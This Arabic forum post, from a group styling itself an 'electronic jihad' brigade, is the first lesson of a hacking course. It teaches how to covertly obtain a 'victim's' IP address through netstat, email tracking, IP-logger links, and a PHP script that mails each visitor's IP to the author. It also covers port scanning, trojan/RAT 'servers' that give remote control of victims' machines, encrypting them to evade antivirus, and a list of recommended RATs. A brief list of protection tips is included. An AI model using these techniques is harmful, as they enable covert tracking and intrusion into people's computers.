Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: الدرس الأول للدورة ( مصطلحات وتعريفات تهم المبتدئين


سريه سفيان بن عوف الغامدي للجهاد الكتروني

Status: Offline
Posts: 632
Date:
الدرس الأول للدورة ( مصطلحات وتعريفات تهم المبتدئين
Permalink   
 



بسم الله نبدأ الدرس الأول

ماهو الآي بي ادرس؟؟

بكل بساطه هو مكانك على النت او عنوانك على الشبكة

يقوم بمنحك هذا الرقم الذي يتكون من اربعة اقسام تفصل بينهم النقاط .
XX.XX.XX.XX

وطوال فترة تواجدك على الإنترنت يبقى رقمك كما هو الي ان تخرج منه , طبعاً الرقم يبقى ثابت الى ان تخرج واذ رجعت يعطيك رقم جديد ( هذا فى حالة الدايل أب , أما فى حالات DSL . ADSL . IDNS ... الخ فيكون رقم الأى بى ثابت دائما )

ومن المستحيل ان تجد جهاز يحمل رقمان متطابقان

او رقم واحد واحد لجهازيين الا في الشبكات اللان LAN والحل طبعاً في الاتصال العكسي

ومن غير رقم الأى بى مستحيل يتم الإختراق

اوضحلك اكثر

اعتبر جهازك هوه بيتك وعتبر المخترق هوه حرامي

طبعاً الاي بي هوه عنوان بيتك اذ حرامي حمار يبي يسرق بيتك ومايعرف عنوانه يقدر يسرقة؟؟

طبعاً لا

الاي بي كذلك اذ المخترق حب يخترق جهاز لازم يعرف الاي بي الخاص فييه

بس طبعا مش كفاية إن حد يعرف عنوان بيتك علشان يخترقتك لازم يعرف ثغرة أو منفذ يدخل منفذ لبيتك
ودى هية وظيفة المنفذ ... وهنتكلم عنها بالتفصيل كمان شوية

لمعرفة الأى بى الخاص بجهازك

اولاً لمستخدمي ويندوز 98 , 95 , ME

من START ثم RUN اكتب الأمر التالي winipcfg

هاذي الصوورة



إذا ظهر لك فى الخانة اصفار يبقى من القائمة النسدلة نختار الى تحت

هنلاقى الرقم طلع لنا زى ما فى الصورة دى



يطلع لك نفس اللي بالصوورة بالضبط طبعاً ايبيك الرقم اللي مظلل بالاحمر

ثانياً لمستخدمي XP , 2000 , 2003

من START ثم RUN اكتب الأمر التالي cmd /k ipconfig

شوف الصورة



1 تكتب الامر

2 تضغط اوكي

ثالثاً

عن طريق الدخوول لهذا الموقع

www.whatismyip.com

لمعرفة الأى بى الخاص بجهاز شحص آخر

استخراج اي بي الضحية من المسنجر

طبعاً لازم يكوون الملف كبيير شوية علشان تلحق تنفذ الخطوات

ترسله صوورة كبيرة او ملف او اي شيء

ترووح تشغل الدووس

شووف الصوورة



طريقة تشغيل الدووس

1 اكتب امر تشغيل الدووس اللي هوه cmd

2 اضغط اوكي

3 اكتب الامر netstat -n مع مراعاة المسافة قبل ال -

هذا ايبي الضحية مثل ما تشووفة

معرفة رقم الأى بى عن طريق ارسال رسالة

الأفضل إنك تشترك فى موقع http://www.confirm.to/
وده رابط التسجيل
http://www.confirm.to/confirm.to/en/signup.html
حط إيميلك ودوس على الزرار الى تحته وهتتبعت لك رسالة بالتفاصيل

المهم انك دلوقتى معاك عضوية فيه ( ممكن تعمل الطريقة من غير عضوية بس رقم الاى بى مش هيوصل كامل )

تروح ترسل رسالة للشخص اللي تبي تعرف ايبية وتزيد على ايميله هذا الامر

confirm.TO

يعني اذا فرضنا بريد الي تبي ترسل له

asbmay@hotmail.com

تزيد عليه الامررر بهذه الطرييقة

asbmay@hotmail.com.confirm.TO

وهذه صورة بسيطة للرسالة



بعدين ترسلها اول ماهو يفتحها تجيلك رسالة



فيها اي بي جهازة



طبعاً بدوون علمة
لو مكنش عندك اشتراك فى الموقع ممكن الاى بى بتاعه ظهر لك فيه آخر مقطعين بس والأول والتانى علامات استفهام

معرفة رقم الأى بى عن طريق الرسائل الصادرة

اذ كنت تبي تعرف ايبي اللي مرسلك الرسالة

ادخل موقع الهوتميل

www.hotmail.com

ادخل بايميلك

راح تشووف بصفحة الرسائل كلمة

options

شووف الصوورة



ادخل عليها

تابع الصوور



راح تلقى كلمة

Mail Dsiplay setting

اضغط عليها

شووف الصوورة



راح تلاقي كلمة

massage headers

فيها خيارات

1 اختر الخيار advanced

2 اضغط اوكي

الحين ترووح على الرسالة اللي تبي تعرف ايبي صاحبها

اول ماتدخل راح تلاقي ايبية وجم معلومة عن جهازة مثل الصوورة



الحين عرفنا الاي بي خلاص

عن طريق بعض المواقع

اول شي نفوت الموقع المطلوب من هان
من هنــــــا,,
نفوت اول شي على مسجل الاي بي متل اللى بالصورة..



بعدها تفتح صفحه جديدة في عدة خيارات
ناخد الخيار الاول اللى هوا وضع رقم انت تختارو لعمل رابط من المنتدى بتاع الشبكه هادي تعطيه لاي شخص انت عايزوو علشان يقراه عادي ..
والارقام من 1 لعند الرقم الىل يحددوه..مع العلم الرقم يزيد بزياده مواضيع المنتدى..
نشوف الصورة

بعد هيك نروح للخيار االتاني اللى هوا صنع الرابط علشان تعطيه للضحيه..
نشوف الصورة

وبعدها نروح للخيار الرابع اللى هوا النسخ للرابط يا بتنسخه بالماسو انت حر,,


وهان انت خلصت نص الشغل نيجي للنص التاين اللى هوا الحصول على الاي بي متل اللي بالصورة


اضغط على الحصول على الاي بي,,
راح تفتح عندك صفحه جديدة... فيها الاي بي 4.gif وكمان مواصفات الاكسبلولر ..
نشوف الصور((اعطيت رابط 242 لواحد صاحب بالايميل عندي..شوية هكر هوا .. ووبعد ما قرا الموضوع((ديني هوا)) ببيقلي موضوع مرتب خخخخخخخ .. قلت اله عمره مر عليك الاي بي هاد ******* :p
خلينا نشوف الصورة بتعته


خخخخخخخخ ما فهم كيف سويتها :p
هيك بيكون الشرح خلص
ومعلش على الشرح السريع ... بس الظروف

عن طريق صفحة php

افتح المفكرة Notepad وحط فيها الكود ده





:


<?php
$ip
= $REMOTE_ADDR
;
mail("AsbMay@hotmail.com","IP Victim",$ip,"AsbMay"
) ;
?>



بس طبعا استبدل الإيميل بإيميلك

وارفع الصفحة على أى موقع بيدعم php
و لو مبتعرفش يبقى اصبر شوية فى درس مخصص لطريقة الحجز على الايكوس لدعم صفحات php

المهم انك دلوقتى رفعت الصفحة على النت
ابعت الصفحة للى عايز تعرف رقم الأى بى بتاعه
بمجرد ما يدخلها هتلاقى الأى بى بتاعه وصلك فى رسالة

معرفة بيانات رقم أى بى معين

فى مواقع كتير بتعمل الخدمة دى بس انا بفضل الموقع ده

http://www.whois.sc/

نكتب رقم الأى بى الى عايزين نعرف معلومات عنه فى خانة البحث



وندوس سيرش



هنلاقى طلعت لنا شوية معلومات عن رقم الاى بى زى الدولة واسم الشركة الى بتقدم الخدمة دى
ونطاق الرقم ده منين لفين

كده يبقى احنا شرحنا كتيييييييير فى رقم الأى بى وعلى فكرة ممكن لسه نقول فيه اكتر بس علشان الناس ما تزهقش

المنفذ

رقم بين 1 و 65536

كل برنامج المبرمج الى صممه بيختار له منفذ

وفى منافذ نظام مفتوحة دائما بس مو اي احد يقدر يستغلها او يستثمرها

وفى منافذ مفتوحة فى الملقمات مثل 80

والمنفذ هو المسؤل عن عملية الإختراق

لإن علشان جهازك يتصل بجهاز تانى لازم رقم الاى بى و المنفذ

زى ما ذكرنا قبل كده إن الأى بى هو عنوان بيتك

والبيت هذا له مداخل كثيره ومنافذ

Ports\منافذ

مثلا فتحنا المتصفح فأنه يقوم بالاتصال بالانترنت عن طريق

المدخل رقم 80 وهو ثابت ومعروف لدى اكل

ومثلا لو فتحنا الماسنجر بيتصل عبر الانترنت عبر بورت

3051

وكل ما نفتح برنامج اتصال سوف تجدون منفذ فتح بجهازك

وطبعا لا احد يستطيع الاختراق عبر هذيب المنافذ

تشخباو هالشغله مثل ابواب البيت عليها حراسه.

وفي بعض البيوت فيها ابواب خلفيه. وهي ما نسميها الباكدورز

Back Doors

والتروجانز وتسمى بالباكدورز

والباكدور=التروجان=السيرفر=الباتش

يعني مثلا انا العميل او الكيلنت وابي ادخل بيت اقوم بأرسال شخص

اخر الى البيت يقوم بفتح الباب خلفي لي وادخل انا

واذا الشخص هذا راح عن البيت لن يفتح لي احد.

تماما مثل الكمبيوتر . بعد ارسال التروجان للجهاز يقوم بفتح منفذ لي احدده انا في اعدادات

السيرفر وقوم السيرفر هذا بفتح منفذ لي لكي اقوم بالدخول

اذا انحذف السيرفر من الجهاز لن استطيع الدخول

لا استطيع الدخول الي الجهاز الا من عبر المنفذ

والحين اتضحت الصوره عندنا

ان المنفذ او البورت:

هو مدخل يقوم الهكرز بالدخول اليه عن طريق الكلاينت او العميل

والتحكم بالجهاز عن طريقه

والحين خلصنا المنفذ

معرفة المنافذ المفتوحة فى جهاز ما

بنستخدم للحكاية برنامج اسمه فاحص منافذ
الأول بنجيب رقم الأى بى وعرفنا فوق إزاى نجيبه

نحط رقم الأى بى فى أى برنامج فاحص منافذ
وبرنامج AsbMay 2.3 فيه فاحص منافذ ودى صورته



دلوقتى هنوضح فكرة عمل البرنامج ده

بيحاول يتصل على كل المنافذ من 1 لـ 65536

ودى صورة توضحية للعملية دى



مع العلم إن المنافذ الى لونها اخضر معناها مفتوح والأحمر مغلق

طريقة فتح المنفذ فى جهاز الضحية

عن طريق السيرفر Trojan

ما هو السيرفر Trojan ؟؟

معنى كلمة Trojan وهى طروادة ومقتبسة من خدعة الإغريق لدخول مينة طروادة على هيئية حصان خشبى كبير برئ

فالترجوان نفس الحكاية

ملف شكله برئ لكن بيفتح ثغرة فى جهازك

و الترجوان هو الى بيفتح المنفذ

وتصنيفه من ضمن فيروسات الباك دور

ممكن توضح اكثر؟؟

السيرفر : هو الخادم بين الهكرز وجهاز الضحيه

طيب يجيني واحد يقولي شلون نسوي سيرفر وشنو هو وضيفته

وجاوبه واقوله:

لكل برنامج هكر سيرفر معين واعدادات معينة

ونعمل فيه سيرفر

وطبعا الشرح موجود بالمنتدى لكن اريد ان اشرحه لكم
فيما بعد

المهم نعمل فيه سيرفر ونحط التبليغ على الاميل الي عندنا

يجيني واحد ويسألني ليش نحط فيه الاميل الي عندي وعلى اي ساس

يقوله: لازم نحط الاميل الي عندك علشان التبليغ يوصلك

على الاميل وهو تبليغ الايبي

ياسلام الحين احنا عرفنا شنو هو السيرفر وشنو علاقته بالاختراق

وواحد بيجيني ويقولي طيب عرفنا السيرفر شنو هوو الباتش هههههه

طبعا الكلمه المتداوله بين المخترقين سيرفر=باتش
Server=patch
Server=خادم
Patch=خادم


من هم الهاكرز

طبعاً الهكر هم قراصنة النت

واصل الكلمة Hackers كلمة انجليزية ومعناها قراصنة

وهم اشخاص مبرمجين ومحترفين قاموا بتطويير انفسهم لكي يستطيعو التسلل للانظمة والاجهزة والسيطرة عليها بطرق غير شرعية

وهم مبرمجون ومحللون اقوياء

انواع الهاكرز

هل الهكر انواع ؟؟ ما هي انواعهم؟؟

نعم الهكر انواع ويختلف تصنيفهم من شخص الى اخر

اربعة انواع

النوع الاول وهم المبتدئيين ولا يختلف احد في تصنيفهم

وهم الاخطر على جهازك لانه يريد تجربة كل ما تعلمه على جهازك ويريد اثبات جدارته فيقووم
بتدمير جهازك..

النوع الثاني وهو المتوسط

هذا النووع يكوون حاب ياخذ معلوومات من جهازك وبس وواكثر المرات لا يستطيع لانه يعتمد
على برامج ليست من صنعه فيصعب علييه تشفيرها ويتمكن الانتي فايرروووس والفايروول من طردة وايقافة يعني خطووتة متوسطة............

النوع الثالث وهو الخبير

يكوون له تجارب كثيرة وخبرة كبيرة وهذا النوع يستطيع استغلال ثغرات الجهاز استغلال تام
ويستطييع استثمارها وتطويرها الى الافضل وهذا ضررة يكوون على حسب شخصيته او مجالة...

النوع الرابع وهو المحترف

وهذا النوع هوه اخطرهم لانه له القدرة على ايجاد الثغرات بكل سهوولة بل بامكانه صنع
الثغرات في جهازكمثل اتاماكا مبرمج البرورات استطاع استغلال البوورت 445 و مبرمج السويكت
الفرنسي الذي استغل البورت 5000 ولكن للاسف العرب قلة منهم محترفين .........







عملية الإختراق

هى القدرة على الوصول لهدف معين رطريقة غير شرعية يقوم أحد الأشخاص
الغير مصرح لهم بالدخول إلى نظام التشغيل في جهازك ويتمكن من السيطرة على جهازك
سيطرة تامة وتتيح له هذة العمليه التجسس على جهازك واخذ مايريد منه وتنفيذ رغباتة مثل فتح الكاميرا او الطباعة او التخزين ..

طبعا عرفنا ايه هو المنفذ وايه هو رقم الأى بى

دلوقتى ايه أصلا عملية الإختراق دى وايه دخل المنفذ والأى بى فيها ؟؟

دلوقتى احنا عرفنا ان رقم الاى بى ده عنوان الجهاز على الشبكة

أولا طريقة الإتصال المشهورة فى كل برامج الإختراق هى البروتوكول TCP/IP

فى ناس بتقول إن البروتكول ده ممكن يتم من غير منفذ !!!!
وده مستحيل تماماً مع TCP/IP

وانا صورت لكم الفكرة بكل بساطة على نموذج بالصور علشان توضح

ده جهاز الضحية قبل ما نبعت له السرفر الى هيفتح المنفذ



هفترض إن عنوان الاى بى بتاع الضحية هو XX.XX.XX.XX والمنفذ الى هنخترق منه YYYY

دلوقتى احنا هنحاول نتصل بجهاز الضحية قبل المنفذ ما يتفتح



هنلاقى الرد هيكون بالشكل ده



يعنى بالرغم من إن رقم الاى بى سليم 100% والعميل ارسل الطلب ليه مباشرة

بس علشان مفيش منفذ العميل مقدرش يتم الإتصال ....

يبقى دلوقتى نبعت السرفر للضحية وبمجرد فتحه هتلاقى المنفذ اتفتح عنده



نشوف دلوقتى محاولة الإتصال ............



هنلاقى إن بعد فتح المنفذ الإتصال تم بنجاح



وبمجرد اتمام الإتصال بتنتهى معاناة الهاكر ووقت الزراعة , ويجى وقت الاستمتاع والحصاد ....

تقدر تعمل اى حاجة فى الضحية دلوقتى مثلا تقدر تشوف ملفاته

يبقى تبعت من العميل إشارة إنك عايز تشوف ملفاته فالسرفر يترجمها على طول ويرد عليك بالبيانات




الحماية من الهاكرز

1 – استخدم اقوى برامج الحماية مثل الكاسبر او المكافى مع تحديثها دائما

2-عدم فتح اى رساله بريد الكترونى غير موثوق فيها

3- عدم استقبال اى برنامج او ملف عبرالمسنجر غير موثوق فيه

4-لاتخلي بااسوورداتك متشابها وخليها صعبة علشان برامج التخميين كثرة

5-لاتعتمد على برامج ميكروسفت فقط لانه اغلاقها اسهل من فتحها

6-استخدام الديب فريز لكن عيووبة معرووفة

7-اهم شيء متابعة اخبار مايكروسفت واخر الاخبار عن الديدان والترجونات

أين يتواجد الخادم فى الجهاز

طيب الباتش وين يبني عشه؟؟

شوف حبيبي هذا الباتش مشكلتة مشكلة

لانه ينسخ نفسه باكثر من مكان وكل برنامج له طريقة ومكان يعشعش فييه

طيب شنو افضل مكان يحبة الباتش علشان يبني عشه فييه؟؟

طبعاً اهو يفضل مكانين

ملفات السيستم

ملفاق الويندووز

مشكووور اخووي والله ما قصرت

العفوو حبيبي وأي سؤال احنا حاضرين

ماعليك الا انك تكتبة في رد وقبل لاتخلص السؤال بتلاقي الجواب ان شاء الله

واحب اذكر انه الحقووق محفووظة لمنتديات عصب ماي


الإمتدادات المعروفة للخادم

هى الإمتدادات التنفيذية الخمسة
exe
scr
bat
com
pif

التشفير

هى مشكلة المشاكل مع برامج الإختراق
فالبرنامج بمجرد ما بينزل للإستخدام بيتم اكتشاف الخادم من برامج الحماية
فالهاكر بيضطر للبحث عن طرق اخفائه عن برامج الحماية وهى المعرفة بالتشفير
وطرقها كتير بس مش هيتسع لنا الوقت نتكلم عنها النهاردة

ماهي اقوى برامج الاختراق

كثير وكل يووم ينزل برنامج جديد

وافضلها

سب سفن قووولد

ايرزر

النوفا

البرورات

شووف حبيبي طبعاً نا عن نفسي افضل برنامج عصب لانه شغله تمام

كل يووم عصب يشفرة ويجيبة يعني ما يتعب

============================
وبكده انتهى الدرس الأول يا شباب
وبكره فى نفس الميعاد هينزل الدرس التانى
والاستفسارات على الشات أو على الماسنجر
============================


__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard